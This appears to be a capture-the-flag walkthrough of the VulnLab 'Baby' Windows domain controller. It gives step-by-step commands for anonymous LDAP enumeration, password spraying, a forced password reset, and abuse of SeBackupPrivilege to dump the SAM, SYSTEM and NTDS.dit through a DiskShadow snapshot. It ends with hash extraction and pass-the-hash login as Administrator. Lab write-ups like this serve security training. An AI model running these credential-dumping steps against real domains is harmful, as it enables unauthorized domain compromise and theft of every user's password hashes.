VL-Baby

VulnLab Baby: Windows Active Directory Privilege Escalation via SeBackupPrivilege and NTDS.dit Extraction

This comprehensive VulnLab penetration testing walkthrough demonstrates a complete Active Directory domain compromise through systematic enumeration and privilege escalation techniques. Starting with network reconnaissance using Nmap that identified a Windows Domain Controller running multiple AD services, I leveraged anonymous LDAP access to discover an initial password (BabyStart123!) embedded in a user’s description field. Through targeted password spraying and credential validation, I identified a user account requiring password change, successfully authenticating as Caroline.Robinson using SMB password reset functionality. The critical breakthrough came from exploiting the SeBackupPrivilege assigned to the compromised user account, which allowed extraction of sensitive Windows registry hives (SAM and SYSTEM) for local hash dumping. However, the real escalation required advanced techniques including Volume Shadow Copy creation via DiskShadow to extract the NTDS.dit file - the crown jewel containing all domain password hashes. This technical walkthrough showcases essential Active Directory penetration testing methodologies including LDAP enumeration, privilege abuse, registry manipulation, and domain controller compromise techniques crucial for Windows domain security assessments and red team operations.

Namap Scan

Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-03-06 14:47:47Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Issuer: commonName=BabyDC.baby.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T14:31:02
| Not valid after:  2025-09-04T14:31:02
| MD5:   48f2:c223:e5c4:356d:b768:8571:f1c6:8950
| SHA-1: 03fd:ff73:d5e1:92bd:32bf:d747:c3fb:bb46:ff4e:6d2d
|_ssl-date: 2025-03-06T14:49:20+00:00; -2h00m00s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: BABY
|   NetBIOS_Domain_Name: BABY
|   NetBIOS_Computer_Name: BABYDC
|   DNS_Domain_Name: baby.vl
|   DNS_Computer_Name: BabyDC.baby.vl
|   DNS_Tree_Name: baby.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-03-06T14:48:39+00:00
5357/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49674/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
55620/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
59532/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 29424/tcp): CLEAN (Timeout)
|   Check 2 (port 15632/tcp): CLEAN (Timeout)
|   Check 3 (port 18953/udp): CLEAN (Timeout)
|   Check 4 (port 41352/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -2h00m00s, deviation: 0s, median: -2h00m00s
| smb2-time: 
|   date: 2025-03-06T14:48:41
|_  start_date: N/A

FOOTHOLD

LDAP

After some enumeration we found that ldap had null session active

After running a query on the hole ldap with the below command we found that one user had a description field with a initial password BabyStart123!. We will try to use that password for the user teresa.bell and if it doesn’t work we will spray it to the rest of the users

# Teresa Bell, it, baby.vl
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Teresa Bell
sn: Bell
description: Set initial password to BabyStart123!

The creds we found for Teresa.Bell but they dont work, so we will gather all of the users and password spray. We gathered the account names threw the below search BUT it was not the correct way:

ldapsearch -x -H ldap://10.10.114.53 -b "DC=baby,DC=vl" "(objectClass=user)" sAMAccountName -LLL

Jacqueline.Barnett
Ashley.Webb
Hugh.George
Leonard.Dyer
Connor.Wilkinson
Joseph.Hughes
Kerry.Wilson
Teresa.Bell

We tried the usernames we gathered but it didnt work in any of them, we tried a more broad ldap search and another user popped up ``

ldapsearch -x -H ldap://10.10.114.53 -b "DC=baby,DC=vl" "user"

SMB

The flag STATUS_PASSWORD_MUST_CHANGE tells us that we first need to change the password before we are able to log in to that user.Using the smbpasswd tool we were able to change Carolines password to Password123!

smbpasswd -r 10.10.114.53 -U 'Caroline.Robinson'

We can check if we have winrm access using the below command

netexec winrm 10.10.114.53 -u Caroline.Robinson  -p 'Password123!'

evil-winrm -i 10.10.114.53 -u Caroline.Robinson -p 'Password123!'

PrivEsc

The user we got has the SeBackupPrivilege flag anabled

Now we can copy the sam and system hive of HKLM and crack them lockaly

Create a temp directory:

mkdir C:\temp

Copy the sam and system hive of HKLM to C:\temp and then download them.

reg save hklm\sam C:\temp\sam.hive

and

reg save hklm\system C:\temp\system.hive

Go on the temp folder and download the system and the sam

download sam.hive

download system.hive

Finally use impacket-secretsdump and obtain the ntlm hashes:

impacket-secretsdump -sam sam.hive -system system.hive LOCAL

Now we can login using evil-winrm and get the root flag

NTDS.DIT

We can see that we cannon log into the machine as the hash we got is for the local administrator. We have to get the hash of the account in the domain (which has exactly the same name). In order to do this, we have to grab “ntds.dit” aswell

Using this script to copy the ntds.dit (xct script)

# save this in script.txt 
set metadata C:\Windows\Temp\meta.cabX 
set context clientaccessibleX 
set context persistentX 
begin backupX 
add volume C: alias cdriveX 
createX 
expose %cdrive% E:X 
end backupX

Then we will run the below commands to get the ntds.dit from the “snapshot” we made

# run diskshadow diskshadow /s script.txt 
# copy ntds to c robocopy /b E:\Windows\ntds . ntds.dit

After downloading the ntds.dit to our local machine and run secretsdump again

impacket-secretsdump -sam sam.hive -system system.hive -ntds ntds.dit LOCAL

evil-winrm -i 10.10.114.53 -u Administrator -H <HASH>

https://api.vulnlab.com/api/v1/share?id=17abb51a-6f38-4585-b4e5-39cd6bf1ac92